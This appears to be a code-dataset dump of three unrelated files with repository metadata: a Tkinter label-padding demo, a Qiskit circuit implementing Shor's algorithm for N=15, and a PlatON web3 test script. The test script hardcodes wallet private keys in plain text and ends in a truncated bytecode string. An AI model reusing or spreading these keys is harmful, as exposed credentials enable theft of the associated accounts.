"bzip2-1.0.6"
] | null | null | null |
PaddingLocation.py
|
arpansarkar190794/Arpan_Sarkar
|
b36f66f0ed00668b005fae903ce463883a803fd5
|
[
"bzip2-1.0.6"
] | null | null | null |
from tkinter import *
gui = Tk()
w = Label( text="Bangalore", bg="red", fg="white")
w.pack(fill=X)
w = Label( text="Karnataka", bg="green", fg="black")
w.pack(fill=X)
gui.mainloop()
from tkinter import *
root = Tk()
w = Label( text="Bangalore", bg="red", fg="white")
w.pack(fill=X,padx=10)
w = Label( text="Karnataka", bg="green", fg="black")
w.pack(fill=X,padx=10)
mainloop()
from tkinter import *
gui = Tk()
w = Label( text="Bangalore", bg="red", fg="white")
w.pack(fill=X,pady=10)
w = Label( text="Karnataka", bg="green", fg="black")
w.pack(fill=X,pady=10)
mainloop()
from tkinter import *
gui = Tk()
w = Label( text="Bangalore", bg="red", fg="white")
w.pack(padx=5, pady=10, side=LEFT)
w = Label(gui, text="Karnataka", bg="green", fg="black")
w.pack(padx=5, pady=20, side=LEFT)
mainloop()
| 19.340909
| 57
| 0.60517
| 138
| 851
| 3.731884
| 0.202899
| 0.093204
| 0.135922
| 0.116505
| 0.866019
| 0.831068
| 0.8
| 0.8
| 0.737864
| 0.737864
| 0
| 0.019971
| 0.176263
| 851
| 43
| 58
| 19.790698
| 0.714693
| 0
| 0
| 0.821429
| 0
| 0
| 0.178218
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d70b8c49c7e6a1e50ad0599507d2af51f182e6c2
| 17,540
|
py
|
Python
|
shor.py
|
jorgebrandao/ShorAlgorithm
|
73187cb39380c2212e26a611d7cb2c2440625af8
|
[
"Apache-2.0"
] | null | null | null |
shor.py
|
jorgebrandao/ShorAlgorithm
|
73187cb39380c2212e26a611d7cb2c2440625af8
|
[
"Apache-2.0"
] | null | null | null |
shor.py
|
jorgebrandao/ShorAlgorithm
|
73187cb39380c2212e26a611d7cb2c2440625af8
|
[
"Apache-2.0"
] | null | null | null |
import sys
sys.path.append('qiskit-sdk-py-master')
from qiskit import QuantumProgram
from math import*
from qiskit.tools.visualization import plot_histogram
#####################COMO USAR AS DIFERENTES GATES######################
#.x(qr[0]) #applying x gate to the first qubit
#.y(qr[0]) #applying y gate to the first qubit
#.z(qr[0]) #applying z gate to the first qubit
#.iden(qr[0]) #identity gate on the first qubit
#.u1(lambd, qr[0]) #applying a u1 gate to the first qubit
#.u2(phi, lambd, qr[0]) #applying a u2 gate to the first qubit
#.u3(theta, phi, lambd, qr[0]) #applying a u3 gate to the first qubit
#.h(qr[0]) #applying h gate to the first qubit
#.s(qr[0]) #applying s gate to the first qubit
#.sdg(qr[0]) #applying sdg gate to the first qubit
#.t(qr[0]) #applying t gate to the first qubit
#.tdg(qr[0]) #applying tdg gate to the first qubit
#.rx(theta, qr[0]) #applying rotation around x-axis gate to the first qubit
#.ry(theta, qr[0]) #applying rotation around y-axis gate to the first qubit
#.rz(phi, qr[0]) #applying rotation around z-axis gate to the first qubit
#.cx(qr[0], qr[1]) #applying cnot gate (do 1 para o 0 (testar melhor...))
#.cy(qr[0], qr[1]) #controlled-y
#.cz(qr[0], qr[1]) #controlled-z
#.ch(qr[0], qr[1]) #controlled-h
#.crz(lambd, qr[0], qr[1]) #controlled rotation around-Z
#.cu1(lambd, qr[0], qr[1]) #controlled u1
#.cu3(theta, phi, lambd, qr[0], qr[1]) #controlled u3
#.swap(qr[0], qr[1]) #swapping the first and second qubits
#.ccx(qr[0], qr[1], qr[2]) #Toffoli gate
#.cswap(qr[0], qr[1], qr[2]) #swapping the second and third qubits controlled by the first qubit
def sh(g):
Q_program = QuantumProgram()
qr = Q_program.create_quantum_register("qr", 12)
cr = Q_program.create_classical_register("cr", 12)
qc = Q_program.create_circuit("superposition", [qr], [cr])
#x (0,1)
#y (2,3,4,5,6)
#b///adder (7,8,9,10,11)
# auxiliar (12)
#a=4 = 0 1 0 0
#N=15 = 1 1 1 1
#a %N = 4*a**2 = 4 = 0 1 0 0
#2*a %N = 8 = 1 0 0 0
#4*a %N == a**2 %N = 1 = 0 0 0 1
#2*a**2 %N = 2 = 0 0 1 0
#########fases
###N
#u2+u3+u4+u5 = 15*pi/16
#u1+u2+u3+u4 = 15*pi/8
#u1+u2+u3 = 7*pi/4
#u1+u2 = 3*pi/2
#u1 = pi
###a
#u3 = pi/4
#u2 = pi/2
#u1 = pi
###############begin###########
#entradas
qc.h(qr[0])
qc.h(qr[1])
#qc.x(qr[0])
#qc.x(qr[1])
qc.x(qr[2])
########qft5 (7-11)
qc.h(qr[11])
qc.u1(pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(pi/4, qr[10])
qc.u1(-pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(pi/8, qr[9])
qc.u1(-pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(pi/16, qr[8])
qc.u1(-pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(pi/32, qr[7])
qc.u1(-pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.h(qr[10])
qc.u1(pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(pi/4, qr[9])
qc.u1(-pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(pi/8, qr[8])
qc.u1(-pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(pi/16, qr[7])
qc.u1(-pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.h(qr[9])
qc.u1(pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(pi/4, qr[8])
qc.u1(-pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(pi/8, qr[7])
qc.u1(-pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.h(qr[8])
qc.u1(pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.u1(pi/4, qr[7])
qc.u1(-pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.h(qr[7])
qc.swap(qr[11], qr[7])
qc.swap(qr[10], qr[8])
##########################################
#add a mod N controlado em 0 e 2
#qc.u1(pi/4, qr[7])
#qc.u1(pi/2, qr[8])
#qc.u1(pi, qr[9])
qc.u1(pi/8, qr[7])
qc.ccx(qr[0], qr[2], qr[7])
qc.u1(pi/8, qr[2])
qc.u1(pi/8, qr[0])
qc.u1(-pi/8, qr[7])
qc.ccx(qr[0], qr[2], qr[7])
qc.u1(pi/4, qr[8])
qc.ccx(qr[0], qr[2], qr[8])
qc.u1(pi/4, qr[2])
qc.u1(pi/4, qr[0])
qc.u1(-pi/4, qr[8])
qc.ccx(qr[0], qr[2], qr[8])
qc.u1(pi/2, qr[9])
qc.ccx(qr[0], qr[2], qr[9])
qc.u1(pi/2, qr[2])
qc.u1(pi/2, qr[0])
qc.u1(-pi/2, qr[9])
qc.ccx(qr[0], qr[2], qr[9])
##########################################
###invqft5
qc.swap(qr[11], qr[7])
qc.swap(qr[10], qr[8])
qc.h(qr[7])
qc.u1(-pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.u1(-pi/4, qr[7])
qc.u1(pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.h(qr[8])
qc.u1(-pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(-pi/8, qr[7])
qc.u1(pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(-pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(-pi/4, qr[8])
qc.u1(pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.h(qr[9])
qc.u1(-pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(-pi/16, qr[7])
qc.u1(pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(-pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(-pi/8, qr[8])
qc.u1(pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(-pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(-pi/4, qr[9])
qc.u1(pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.h(qr[10])
qc.u1(-pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(-pi/32, qr[7])
qc.u1(pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(-pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(-pi/16, qr[8])
qc.u1(pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(-pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(-pi/8, qr[9])
qc.u1(pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(-pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(-pi/4, qr[10])
qc.u1(pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.h(qr[11])
################################
#swap controlado
qc.ccx(qr[0], qr[2], qr[7])
qc.ccx(qr[0], qr[7], qr[2])
qc.ccx(qr[0], qr[2], qr[7])
qc.ccx(qr[0], qr[3], qr[8])
qc.ccx(qr[0], qr[8], qr[3])
qc.ccx(qr[0], qr[3], qr[8])
qc.ccx(qr[0], qr[4], qr[9])
qc.ccx(qr[0], qr[9], qr[4])
qc.ccx(qr[0], qr[4], qr[9])
qc.ccx(qr[0], qr[5], qr[10])
qc.ccx(qr[0], qr[10], qr[5])
qc.ccx(qr[0], qr[5], qr[10])
qc.ccx(qr[0], qr[6], qr[11])
qc.ccx(qr[0], qr[11], qr[6])
qc.ccx(qr[0], qr[6], qr[11])
################################
#cnot em 7
qc.cx(qr[0], qr[7])
################################
########qft5 (7-11)
qc.h(qr[11])
qc.u1(pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(pi/4, qr[10])
qc.u1(-pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(pi/8, qr[9])
qc.u1(-pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(pi/16, qr[8])
qc.u1(-pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(pi/32, qr[7])
qc.u1(-pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.h(qr[10])
qc.u1(pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(pi/4, qr[9])
qc.u1(-pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(pi/8, qr[8])
qc.u1(-pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(pi/16, qr[7])
qc.u1(-pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.h(qr[9])
qc.u1(pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(pi/4, qr[8])
qc.u1(-pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(pi/8, qr[7])
qc.u1(-pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.h(qr[8])
qc.u1(pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.u1(pi/4, qr[7])
qc.u1(-pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.h(qr[7])
qc.swap(qr[11], qr[7])
qc.swap(qr[10], qr[8])
#######################################
#add a**2%N=1
#qc.u1(pi/16, qr[7])
#qc.u1(pi/8, qr[8])
#qc.u1(pi/4, qr[9])
#qc.u1(pi/2, qr[10])
#qc.u1(pi, qr[11])
qc.u1(pi/32, qr[7])
qc.ccx(qr[1], qr[2], qr[7])
qc.u1(pi/32, qr[2])
qc.u1(pi/32, qr[1])
qc.u1(-pi/32, qr[7])
qc.ccx(qr[1], qr[2], qr[7])
qc.u1(pi/16, qr[8])
qc.ccx(qr[1], qr[2], qr[8])
qc.u1(pi/16, qr[2])
qc.u1(pi/16, qr[1])
qc.u1(-pi/16, qr[8])
qc.ccx(qr[1], qr[2], qr[8])
qc.u1(pi/8, qr[9])
qc.ccx(qr[1], qr[2], qr[9])
qc.u1(pi/8, qr[2])
qc.u1(pi/8, qr[1])
qc.u1(-pi/8, qr[9])
qc.ccx(qr[1], qr[2], qr[9])
qc.u1(pi/4, qr[10])
qc.ccx(qr[1], qr[2], qr[10])
qc.u1(pi/4, qr[2])
qc.u1(pi/4, qr[1])
qc.u1(-pi/4, qr[10])
qc.ccx(qr[1], qr[2], qr[10])
qc.u1(pi/2, qr[11])
qc.ccx(qr[1], qr[2], qr[11])
qc.u1(pi/2, qr[2])
qc.u1(pi/2, qr[1])
qc.u1(-pi/2, qr[11])
qc.ccx(qr[1], qr[2], qr[11])
#add 2a**2 modN
#add 4a**2 modN = 4
#qc.u1(pi/4, qr[7])
#qc.u1(pi/2, qr[8])
#qc.u1(pi, qr[9])
qc.u1(pi/8, qr[7])
qc.ccx(qr[1], qr[4], qr[7])
qc.u1(pi/8, qr[4])
qc.u1(pi/8, qr[1])
qc.u1(-pi/8, qr[7])
qc.ccx(qr[1], qr[4], qr[7])
qc.u1(pi/4, qr[8])
qc.ccx(qr[1], qr[4], qr[8])
qc.u1(pi/4, qr[4])
qc.u1(pi/4, qr[1])
qc.u1(-pi/4, qr[8])
qc.ccx(qr[1], qr[4], qr[8])
qc.u1(pi/2, qr[9])
qc.ccx(qr[1], qr[4], qr[9])
qc.u1(pi/2, qr[4])
qc.u1(pi/2, qr[1])
qc.u1(-pi/2, qr[9])
qc.ccx(qr[1], qr[4], qr[9])
##########################################
###invqft5
qc.swap(qr[11], qr[7])
qc.swap(qr[10], qr[8])
qc.h(qr[7])
qc.u1(-pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.u1(-pi/4, qr[7])
qc.u1(pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.h(qr[8])
qc.u1(-pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(-pi/8, qr[7])
qc.u1(pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(-pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(-pi/4, qr[8])
qc.u1(pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.h(qr[9])
qc.u1(-pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(-pi/16, qr[7])
qc.u1(pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(-pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(-pi/8, qr[8])
qc.u1(pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(-pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(-pi/4, qr[9])
qc.u1(pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.h(qr[10])
qc.u1(-pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(-pi/32, qr[7])
qc.u1(pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(-pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(-pi/16, qr[8])
qc.u1(pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(-pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(-pi/8, qr[9])
qc.u1(pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(-pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(-pi/4, qr[10])
qc.u1(pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.h(qr[11])
################################
#swap controlado
qc.ccx(qr[1], qr[2], qr[7])
qc.ccx(qr[1], qr[7], qr[2])
qc.ccx(qr[1], qr[2], qr[7])
qc.ccx(qr[1], qr[3], qr[8])
qc.ccx(qr[1], qr[8], qr[3])
qc.ccx(qr[1], qr[3], qr[8])
qc.ccx(qr[1], qr[4], qr[9])
qc.ccx(qr[1], qr[9], qr[4])
qc.ccx(qr[1], qr[4], qr[9])
qc.ccx(qr[1], qr[5], qr[10])
qc.ccx(qr[1], qr[10], qr[5])
qc.ccx(qr[1], qr[5], qr[10])
qc.ccx(qr[1], qr[6], qr[11])
qc.ccx(qr[1], qr[11], qr[6])
qc.ccx(qr[1], qr[6], qr[11])
################################
########qft5 (7-11)
qc.h(qr[11])
qc.u1(pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(pi/4, qr[10])
qc.u1(-pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(pi/8, qr[9])
qc.u1(-pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(pi/16, qr[8])
qc.u1(-pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(pi/32, qr[7])
qc.u1(-pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.h(qr[10])
qc.u1(pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(pi/4, qr[9])
qc.u1(-pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(pi/8, qr[8])
qc.u1(-pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(pi/16, qr[7])
qc.u1(-pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.h(qr[9])
qc.u1(pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(pi/4, qr[8])
qc.u1(-pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(pi/8, qr[7])
qc.u1(-pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.h(qr[8])
qc.u1(pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.u1(pi/4, qr[7])
qc.u1(-pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.h(qr[7])
qc.swap(qr[11], qr[7])
qc.swap(qr[10], qr[8])
################################
#add a**2%N=1
#qc.u1(pi/16, qr[7])
#qc.u1(pi/8, qr[8])
#qc.u1(pi/4, qr[9])
#qc.u1(pi/2, qr[10])
#qc.u1(pi, qr[11])
qc.u1(-pi/32, qr[7])
qc.ccx(qr[1], qr[2], qr[7])
qc.u1(-pi/32, qr[2])
qc.u1(-pi/32, qr[1])
qc.u1(pi/32, qr[7])
qc.ccx(qr[1], qr[2], qr[7])
qc.u1(-pi/16, qr[8])
qc.ccx(qr[1], qr[2], qr[8])
qc.u1(-pi/16, qr[2])
qc.u1(-pi/16, qr[1])
qc.u1(pi/16, qr[8])
qc.ccx(qr[1], qr[2], qr[8])
qc.u1(-pi/8, qr[9])
qc.ccx(qr[1], qr[2], qr[9])
qc.u1(-pi/8, qr[2])
qc.u1(-pi/8, qr[1])
qc.u1(pi/8, qr[9])
qc.ccx(qr[1], qr[2], qr[9])
qc.u1(-pi/4, qr[10])
qc.ccx(qr[1], qr[2], qr[10])
qc.u1(-pi/4, qr[2])
qc.u1(-pi/4, qr[1])
qc.u1(pi/4, qr[10])
qc.ccx(qr[1], qr[2], qr[10])
qc.u1(-pi/2, qr[11])
qc.ccx(qr[1], qr[2], qr[11])
qc.u1(-pi/2, qr[2])
qc.u1(-pi/2, qr[1])
qc.u1(pi/2, qr[11])
qc.ccx(qr[1], qr[2], qr[11])
################################
#sub a mod N controlado em 1 e 4
#qc.u1(pi/4, qr[7])
#qc.u1(pi/2, qr[8])
#qc.u1(pi, qr[9])
qc.u1(-pi/8, qr[7])
qc.ccx(qr[1], qr[4], qr[7])
qc.u1(-pi/8, qr[4])
qc.u1(-pi/8, qr[1])
qc.u1(pi/8, qr[7])
qc.ccx(qr[1], qr[4], qr[7])
qc.u1(-pi/4, qr[8])
qc.ccx(qr[1], qr[4], qr[8])
qc.u1(-pi/4, qr[4])
qc.u1(-pi/4, qr[1])
qc.u1(pi/4, qr[8])
qc.ccx(qr[1], qr[4], qr[8])
qc.u1(-pi/2, qr[9])
qc.ccx(qr[1], qr[4], qr[9])
qc.u1(-pi/2, qr[4])
qc.u1(-pi/2, qr[1])
qc.u1(pi/2, qr[9])
qc.ccx(qr[1], qr[4], qr[9])
################################
###invqft5
qc.swap(qr[11], qr[7])
qc.swap(qr[10], qr[8])
qc.h(qr[7])
qc.u1(-pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.u1(-pi/4, qr[7])
qc.u1(pi/4, qr[8])
qc.cx(qr[7], qr[8])
qc.h(qr[8])
qc.u1(-pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(-pi/8, qr[7])
qc.u1(pi/8, qr[9])
qc.cx(qr[7], qr[9])
qc.u1(-pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.u1(-pi/4, qr[8])
qc.u1(pi/4, qr[9])
qc.cx(qr[8], qr[9])
qc.h(qr[9])
qc.u1(-pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(-pi/16, qr[7])
qc.u1(pi/16, qr[10])
qc.cx(qr[7], qr[10])
qc.u1(-pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(-pi/8, qr[8])
qc.u1(pi/8, qr[10])
qc.cx(qr[8], qr[10])
qc.u1(-pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.u1(-pi/4, qr[9])
qc.u1(pi/4, qr[10])
qc.cx(qr[9], qr[10])
qc.h(qr[10])
qc.u1(-pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(-pi/32, qr[7])
qc.u1(pi/32, qr[11])
qc.cx(qr[7], qr[11])
qc.u1(-pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(-pi/16, qr[8])
qc.u1(pi/16, qr[11])
qc.cx(qr[8], qr[11])
qc.u1(-pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(-pi/8, qr[9])
qc.u1(pi/8, qr[11])
qc.cx(qr[9], qr[11])
qc.u1(-pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.u1(-pi/4, qr[10])
qc.u1(pi/4, qr[11])
qc.cx(qr[10], qr[11])
qc.h(qr[11])
################################
#qft-1 em 0 e 1
qc.swap(qr[0], qr[1])
qc.h(qr[0])
qc.u1(-pi/4, qr[1])
qc.cx(qr[0], qr[1])
qc.u1(-pi/4, qr[0])
qc.u1(pi/4, qr[1])
qc.cx(qr[0], qr[1])
qc.h(qr[1])
qc.measure(qr, cr)
result = Q_program.execute(["superposition"], backend='local_qasm_simulator', shots=g)
print(result)
print(result.get_data("superposition"))
| 22.035176
| 108
| 0.418529
| 3,693
| 17,540
| 1.984024
| 0.037097
| 0.152859
| 0.227651
| 0.095537
| 0.867613
| 0.8107
| 0.776443
| 0.766207
| 0.760748
| 0.760748
| 0
| 0.146469
| 0.289624
| 17,540
| 795
| 109
| 22.062893
| 0.441573
| 0.136488
| 0
| 0.90625
| 0
| 0
| 0.006067
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001953
| false
| 0
| 0.007813
| 0
| 0.009766
| 0.003906
| 0
| 0
| 1
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
d71c65d5817c4dd938e1d20422e6341be37a2eb9
| 41,799
|
py
|
Python
|
tests/WasmTest1.py
|
jiuen1115/SM-client-sdk-python
|
88ffa77b196803fb141c0b4d27d2841aaebab800
|
[
"MIT"
] | 7
|
2019-03-18T06:56:18.000Z
|
2021-05-06T07:41:02.000Z
|
tests/WasmTest1.py
|
jiuen1115/SM-client-sdk-python
|
88ffa77b196803fb141c0b4d27d2841aaebab800
|
[
"MIT"
] | 12
|
2020-09-18T05:46:27.000Z
|
2021-12-24T09:38:31.000Z
|
tests/WasmTest1.py
|
PlatONnetwork/client-sdk-python
|
94ad57bb34b5ee7bb314ac858071686382c55402
|
[
"MIT"
] | 16
|
2019-02-28T03:21:14.000Z
|
2021-07-15T06:49:39.000Z
|
from hexbytes import HexBytes
from client_sdk_python import Web3, HTTPProvider
from client_sdk_python.eth import PlatON
# import binascii
# f = open('D:/juzhen/SimpleStorage.wasm','rb')
# contents=f.read()
# bytecode=binascii.b2a_hex(contents)
true = True
false = False
#10.1.1.5 ./keytool genkeypair
# Address: lax1du4w3q0h5gpxh2vpdvtl7m8h2p9qj40a2krhx7
# PrivateKey: de66562d36f1db46a55f966cfb0eb0981e3e219aa6050612e9f3cb29b8b5c89d
# PublicKey : 6c71c6cfaed8732dafe6ce8888165ac6c8a126e286c226d0ea08fcac768ece512d1eeffad2c442ade2376b2c47472dcea7e30882855f5a3557261b95a72ae9d8
# 10.1.1.8 juzix@juzix:~/linux/bin$ ./keytool genkeypair
# Address: lax13gz7uf8eht4p0leeq3r5z6c88es458twj2tfu9
# PrivateKey: a90f9b646e699909cc5a5c8a95bff1bfd744755fa99a0db03327212527d3c33b
# PublicKey : fc731c6429a0b752e896aa9593afdbae9c10f5f7b77fbcb28820aa9600c2273cf2291deca15670432feac9dbdd56097772bc4cb8d219d094055107e004da6e3d
w3 = Web3(HTTPProvider("http://10.1.1.2:6789"))
platon = PlatON(w3)
print(w3.isConnected())
# from_address = "lax1du4w3q0h5gpxh2vpdvtl7m8h2p9qj40a2krhx7"
from_address = "lax1uqug0zq7rcxddndleq4ux2ft3tv6dqljphydrl"
print(from_address)
# send_privatekey = "de66562d36f1db46a55f966cfb0eb0981e3e219aa6050612e9f3cb29b8b5c89d"
send_privatekey = "983759fe9aac227c535b21d78792d79c2f399b1d43db46ae6d50a33875301557"
# bytecode='0061736d0100000001480d60027f7f0060017f017f60017f0060027f7f017f60037f7f7f017f60000060037f7f7f0060047f7f7f7f017f60047f7f7f7f0060027f7e006000017f60027f7e017f60017f017e02a9010703656e760c706c61746f6e5f70616e6963000503656e7617706c61746f6e5f6765745f696e7075745f6c656e677468000a03656e7610706c61746f6e5f6765745f696e707574000203656e7617706c61746f6e5f6765745f73746174655f6c656e677468000303656e7610706c61746f6e5f6765745f7374617465000703656e7610706c61746f6e5f7365745f7374617465000803656e760d706c61746f6e5f72657475726e0000034e4d05000003030307000201000201050104060201000c000101010902000b0203030507010201000003090404060002000104000003000403020000080001000407020406020000050601010800000405017001030305030100020608017f0141d088040b073904066d656d6f72790200115f5f7761736d5f63616c6c5f63746f727300070f5f5f66756e63735f6f6e5f65786974002706696e766f6b6500140908010041010b0208080ac9644d0400104d0b0b00200041186a200110090b800101027f230041206b22032400024020002802042202200028020847044020022001100b1a2000200028020441246a3602040c010b200341086a2000200220002802006b41246d220241016a100c2002200041086a100d22022802082001100b1a2002200228020841246a36020820002002100e2002100f0b200341206a24000ba10101037f20004200370200200041086a2202410036020020012d0000410171450440200020012902003702002002200141086a28020036020020000f0b20012802082103024020012802042201410a4d0440200020014101743a0000200041016a21020c010b200141106a4170712204101321022000200136020420002004410172360200200020023602080b200220032001104e200120026a41003a000020000b250020002001100a1a2000410c6a2001410c6a100a1a200041186a200141186a100a1a20000b2f01017f2001200028020820002802006b41246d2200410174220220022001491b41c7e3f138200041e3f1b81c491b0b4c01017f2000410036020c200041106a2003360200200104402001101021040b2000200436020020002004200241246c6a220236020820002004200141246c6a36020c2000200236020420000b900101027f2000280204210220002802002103034020022003464504402001280204415c6a2002415c6a2202101120012001280204415c6a3602040c010b0b200028020021022000200128020436020020012002360204200028020421022000200128020836020420012002360208200028020821022000200128020c3602082001200236020c200120012802043602000b2b01027f200028020821012000280204210203402001200247044020002001415c6a22013602080c010b0b0b0900200041246c10130b620020002001290200370200200041086a200141086a28020036020020011012200041146a200141146a2802003602002000200129020c37020c2001410c6a1012200041206a200141206a28020036020020002001290218370218200141186a10120b2201017f03402001410c470440200020016a4100360200200141046a21010c010b0b0b0b002000410120001b10150b9f0602057f017e230041a0016b22002400104d10012201101522031002200041206a200041086a200320011016220241001017200041206a101802400240200041206a1019450d002000280224450d0020002802202d000041c001490d010b10000b20004180016a200041206a101a200028028401220141094f044010000b20002802800121030340200104402001417f6a210120033100002005420886842105200341016a21030c010b0b024002402005500d00418008101b200551044020024101101c0c020b418508101b200551044020024102101c0c020b419108101b20055104402002101d410147044010000b200041206a101e21032000413c6a280200210220002802382104200041d8006a101f210120004198016a410036020020004190016a420037030020004188016a4200370300200042003703800120004180016a200220046b41246d41ff0171ad22051020200028028001210220004180016a4104721021200120021022200120051023220128020c200141106a28020047044010000b200128020020012802041006200128020c22020440200120023602100b200310240c020b41a208101b2005520d002002101d410247044010000b200041206a200241011017200041206a101802400240200041206a1019450d002000280224450d0020002802202d000041c001490d010b10000b20004180016a200041206a101a200028028401220141024f04